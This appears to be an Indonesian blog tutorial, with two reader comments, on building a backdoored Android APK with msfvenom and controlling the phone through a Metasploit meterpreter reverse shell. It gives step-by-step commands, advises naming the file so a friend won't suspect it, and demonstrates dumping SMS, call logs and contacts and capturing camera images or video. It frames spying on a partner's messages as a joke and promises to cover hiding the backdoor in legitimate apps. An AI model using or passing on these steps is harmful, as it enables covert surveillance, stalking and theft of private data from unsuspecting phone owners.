Assalamualaikum Wr.Wb
1. Membuat file .apk atau sebagai backdoor
2. Meneruskan Backdoor agar berjalan dengan Metasploit
3. Mengirim File dan Eksekusi File
4. Dump atau exploit
Bahan - bahan :
1. Kali Linux
2. Android ( Semua Versi )
3. Metasploit
4. WAIPAI /WI-FI yang bagustt ..... disini saya memakai wifi yang kenceng bener jadi tidak ada masalah sama sekali :v
LANGSUNG MULAI AJA GAUSAH BANYAK BCT !!
1. Membuat File APK
Cek IP terlebih dahulu ... dan IP saya adalah 192.168.0.109 dan ingat ingat
#ifconfig
Lalu buat file apk nya ...
#msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=444 R >tes.apkKeterangan :
1. LHOST : IP anda yang sudah anda cek tadi ( saya : 192.168.0.109 )
2. LPORT : Masukkan port ( Terserah berapa saja .. saya anjurkan 4444 )
3. tes.apk : ini adalah file backdoor anda ... anda dapat menamai apa saja , beri nama yg unik agar tidak curiga
Cek pada file apk anda apakah ada atau tidak .. dan berikan pada teman anda atau install sendiri di smartphone teman anda
File berada pada /home
2. Jalankan Metasploit
Jalankan metasploit dengan perintah dibawah ini
#msfconsoleuntuk membuka metasploit
msf > use exploit/multi/handler
msf exploit (handler) > set payload android/meterpreter/reverse_tcp
msf exploit (handler) > set lhost 192.168.0.109
msf exploit (handler) > set lport 4444
msf exploit (handler) > exploit
Terminal akan berhenti pada starting the payload handler .... agar berjalan lagi anda harus menginstall file apk atau backdoor pada android anda atau teman anda....
3. Mengirim File & Eksekusi File
Nama file yang tadi anda buat akan menjadi MainActivity sebagai defaultnya ,,, lalu anda install
4 . Metasploit
Lalu terminal anda akan berjalan seperti dibawah ini .
meterpreter > helpPerintah diatas untuk melihat semua perintah yg bisa dilakukan metasploit
Cek terlebih dahulu info device anda benar atau tidak
meterpreter > sysinfo
Sekarang kita coba lihat SMS nya :v selingkuh atau tidak dia :v
meterpreter > dump_sms
Setelah di dump anda akan melihat filenya di folder anda
/home
Lalu kita buka dan....... TERNYATA ... SELINGKUH DENGAN OPERATOR AXOS :V gaboleh nyebut merk
Selebihnya anda kembangkan sendiri exploit anda dan anda dapat mencari perintah exploit di perintah help
meterpreter > helpDisitu akan banyak sekali perintah untuk dump :V beberapa contoh dibawah :
- dump_callog ( untuk melihat log panggilan )
- dump _contacts ( untuk melihat contact )
- dump_snap ( untuk mengambil gambar dari kamera handphone )
- dump_stream ( untuk memutar video secara live atau stream )
Sebenarnya masih ada cara lain yaitu menyisipkan file backdoor pada file apk , jadi apk file apa saja dapat dijalankan misalnya file instagram.apk dan sesudah diinstall dapat berjalan seperti biasa atau instagram biasa dan kita bisa mengakses HP victim tanpa ada curiga :v nanti di PART 2 ya....
Ada juga Exploit untuk beda jaringan ( Part 3 )
Jadi itu saja yang dapat saya sampaikan kurang lebihnya mohon maaf ...
Wassalamualaikum Wr.Wb
Mas aplikasi yang sudah di buat gak bisa di instal di android, itu penyebabnya apa ya?
BalasHapusKarena aplikasi sudah terinstall sebelumnya
Hapus-Admin